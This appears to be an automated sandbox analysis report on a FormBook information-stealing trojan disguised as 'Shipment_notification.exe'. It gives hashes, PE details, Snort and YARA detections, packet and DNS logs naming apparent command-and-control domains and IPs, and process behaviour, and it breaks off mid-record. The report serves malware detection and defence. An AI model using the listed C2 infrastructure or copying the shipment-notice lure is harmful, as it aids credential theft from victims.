                                                                              SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                              MD5:292F98D765C8712910776C89ADDE2311
                                                                              SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                              SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                              SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.8691620331810155
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Shipment_notification.exe
                                                                              File size:772096
                                                                              MD5:c310a64af890ac32abff89e86cb53a33
                                                                              SHA1:509cdec4d058011fb55535a936e56d3158f3f05a
                                                                              SHA256:90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
                                                                              SHA512:095334ee039c7c70b5459b16f1e8d66b56cb7847d3769859182ef5764a8fcb6720cddbc20fc7b5a2c87a6ec4141a70b537e59e27f7fd2ff57c0c325e1b803fce
                                                                              SSDEEP:12288:PIrmYMUnFW/NObV55FbasbtrKnnRy50vHKB0otonixVtd/FmQSBhVa8i6NFJHKoR:PIrUUj5FbfVoy5hB0hnixT9FHI04qooW
                                                                              TLSH:1AF402206B975636F13523BD85E46296A77EB3A62B13C54D14F212CE1B23F0349D1A3F
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0.................. ........@.. ....................... ............@................................

                                                                              File Icon

                                                                              Icon Hash:209480e66eb84902

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4bd0fa
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6417DEA8 [Mon Mar 20 04:18:48 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xbd0a80x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x1110.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xbbc980x54.text
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xbb1000xbb200False0.9291656229124916data7.877600970637655IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xbe0000x11100x1200False0.7309027777777778data6.633661427958474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xc00000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0xbe1000xa79PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                              RT_GROUP_ICON0xbeb8c0x14data
                                                                              RT_VERSION0xbebb00x360data
                                                                              RT_MANIFEST0xbef200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              192.168.2.5198.177.124.5749706802031453 03/20/23-16:50:29.247456TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.5198.177.124.57
                                                                              192.168.2.5199.59.243.22349702802031453 03/20/23-16:50:05.917395TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.5199.59.243.223
                                                                              192.168.2.5198.177.124.5749706802031412 03/20/23-16:50:29.247456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.5198.177.124.57
                                                                              192.168.2.5154.218.155.849704802031453 03/20/23-16:50:21.020230TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5154.218.155.8
                                                                              192.168.2.5198.177.124.5749706802031449 03/20/23-16:50:29.247456TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970680192.168.2.5198.177.124.57
                                                                              192.168.2.5154.218.155.849704802031412 03/20/23-16:50:21.020230TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5154.218.155.8
                                                                              192.168.2.5199.59.243.22349702802031449 03/20/23-16:50:05.917395TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.5199.59.243.223
                                                                              192.168.2.5154.218.155.849704802031449 03/20/23-16:50:21.020230TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970480192.168.2.5154.218.155.8
                                                                              192.168.2.5199.59.243.22349702802031412 03/20/23-16:50:05.917395TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.5199.59.243.223

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 20, 2023 16:49:36.752985954 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.798513889 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.798667908 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.798851013 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.846467018 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.846508026 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.846534014 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:36.846668005 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.846815109 CET4969580192.168.2.5185.27.134.217
                                                                              Mar 20, 2023 16:49:36.893564939 CET8049695185.27.134.217192.168.2.5
                                                                              Mar 20, 2023 16:49:47.305160046 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:47.408058882 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.409275055 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:47.409413099 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:47.507940054 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.522320986 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.522334099 CET804969766.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:47.522448063 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:48.911513090 CET4969780192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:49.943849087 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.047447920 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.047601938 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.047743082 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.153841019 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.166798115 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.166841030 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:50.167016029 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.167174101 CET4969880192.168.2.566.96.161.158
                                                                              Mar 20, 2023 16:49:50.270334959 CET804969866.96.161.158192.168.2.5
                                                                              Mar 20, 2023 16:49:55.218449116 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.362806082 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.363044977 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.363253117 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.507684946 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599078894 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599138021 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599172115 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599205971 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.599205971 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.599307060 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.616341114 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.616391897 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.616436005 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.616446018 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.636303902 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.636338949 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.636357069 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.636382103 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.636410952 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:55.638071060 CET8049699206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:55.638227940 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:56.865391970 CET4969980192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:57.958993912 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.106313944 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.106503010 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.125310898 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.271821976 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.301676989 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.301717043 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:49:58.301903009 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.302017927 CET4970080192.168.2.5206.54.190.30
                                                                              Mar 20, 2023 16:49:58.448338985 CET8049700206.54.190.30192.168.2.5
                                                                              Mar 20, 2023 16:50:03.352196932 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.371409893 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.371604919 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.374115944 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.393213987 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574099064 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574167013 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574197054 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.574322939 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:03.589508057 CET8049701199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:03.589802980 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:04.881839991 CET4970180192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.897761106 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.916883945 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:05.917094946 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.917395115 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:05.936451912 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120157957 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120187044 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120206118 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120223999 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.120419025 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.120467901 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.120614052 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.132888079 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:06.134841919 CET4970280192.168.2.5199.59.243.223
                                                                              Mar 20, 2023 16:50:06.141745090 CET8049702199.59.243.223192.168.2.5
                                                                              Mar 20, 2023 16:50:17.256160021 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:17.533209085 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.533366919 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:17.533485889 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:17.810214996 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.879627943 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.879694939 CET8049703154.218.155.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.879858017 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:19.728488922 CET4970380192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:20.743052006 CET4970480192.168.2.5154.218.155.8
                                                                              Mar 20, 2023 16:50:21.019658089 CET8049704154.218.155.8192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 20, 2023 16:49:31.670409918 CET5864853192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:31.692192078 CET53586488.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:49:36.711066961 CET5689453192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:36.748585939 CET53568948.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:49:47.181622028 CET6084153192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:47.295319080 CET53608418.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:49:55.184149027 CET6189353192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:49:55.216954947 CET53618938.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:03.326172113 CET6064953192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:03.350786924 CET53606498.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:11.142652035 CET5144153192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:11.171879053 CET53514418.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:12.181365967 CET4917753192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:12.202626944 CET53491778.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:17.231201887 CET4972453192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:17.255079031 CET53497248.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:26.343081951 CET6145253192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:26.362843990 CET53614528.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:34.530338049 CET6532353192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:34.561840057 CET53653238.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:51.235682964 CET5148453192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:51.260627031 CET53514848.8.8.8192.168.2.5
                                                                              Mar 20, 2023 16:50:58.838778973 CET6344653192.168.2.58.8.8.8
                                                                              Mar 20, 2023 16:50:58.860341072 CET53634468.8.8.8192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Mar 20, 2023 16:49:31.670409918 CET192.168.2.58.8.8.80xa49Standard query (0)www.emagrecarapido.storeA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:36.711066961 CET192.168.2.58.8.8.80xb396Standard query (0)www.isabellagambitta.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:47.181622028 CET192.168.2.58.8.8.80x30a5Standard query (0)www.drkathleensanders.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:55.184149027 CET192.168.2.58.8.8.80x94e6Standard query (0)www.carcosainvest.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:03.326172113 CET192.168.2.58.8.8.80x35e6Standard query (0)www.piergitarshoes.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:11.142652035 CET192.168.2.58.8.8.80x86abStandard query (0)www.tcatelier.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:12.181365967 CET192.168.2.58.8.8.80xddc4Standard query (0)www.tcatelier.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:17.231201887 CET192.168.2.58.8.8.80xccf9Standard query (0)www.ywtxsm.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:26.343081951 CET192.168.2.58.8.8.80x51a6Standard query (0)www.peramid.xyzA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:34.530338049 CET192.168.2.58.8.8.80xcf32Standard query (0)www.locationsbormes.comA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:51.235682964 CET192.168.2.58.8.8.80xdeecStandard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:58.838778973 CET192.168.2.58.8.8.80x1301Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Mar 20, 2023 16:49:31.692192078 CET8.8.8.8192.168.2.50xa49Name error (3)www.emagrecarapido.storenonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:36.748585939 CET8.8.8.8192.168.2.50xb396No error (0)www.isabellagambitta.com185.27.134.217A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:47.295319080 CET8.8.8.8192.168.2.50x30a5No error (0)www.drkathleensanders.com66.96.161.158A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:55.216954947 CET8.8.8.8192.168.2.50x94e6No error (0)www.carcosainvest.comcarcosainvest.comCNAME (Canonical name)IN (0x0001)false
                                                                              Mar 20, 2023 16:49:55.216954947 CET8.8.8.8192.168.2.50x94e6No error (0)carcosainvest.com206.54.190.30A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:03.350786924 CET8.8.8.8192.168.2.50x35e6No error (0)www.piergitarshoes.com199.59.243.223A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:11.171879053 CET8.8.8.8192.168.2.50x86abName error (3)www.tcatelier.comnonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:12.202626944 CET8.8.8.8192.168.2.50xddc4Name error (3)www.tcatelier.comnonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:17.255079031 CET8.8.8.8192.168.2.50xccf9No error (0)www.ywtxsm.com154.218.155.8A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:26.362843990 CET8.8.8.8192.168.2.50x51a6No error (0)www.peramid.xyz198.177.124.57A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:34.561840057 CET8.8.8.8192.168.2.50xcf32No error (0)www.locationsbormes.com45.114.105.2A (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:51.260627031 CET8.8.8.8192.168.2.50xdeecName error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                                              Mar 20, 2023 16:50:58.860341072 CET8.8.8.8192.168.2.50x1301Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.isabellagambitta.com
                                                                              • www.drkathleensanders.com
                                                                              • www.carcosainvest.com
                                                                              • www.piergitarshoes.com
                                                                              • www.ywtxsm.com
                                                                              • www.peramid.xyz
                                                                              • www.locationsbormes.com

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:16:48:46
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0x1a0000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:1
                                                                              Start time:16:48:57
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0x300000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:2
                                                                              Start time:16:48:57
                                                                              Start date:20/03/2023
                                                                              Path:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              Imagebase:0xfc0000
                                                                              File size:772096 bytes
                                                                              MD5 hash:C310A64AF890AC32ABFF89E86CB53A33
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:3
                                                                              Start time:16:49:00
                                                                              Start date:20/03/2023
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff69bc80000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:4
                                                                              Start time:16:49:14
                                                                              Start date:20/03/2023
                                                                              Path:C:\Windows\SysWOW64\control.exe
                                                                              Wow64 process (32bit):true
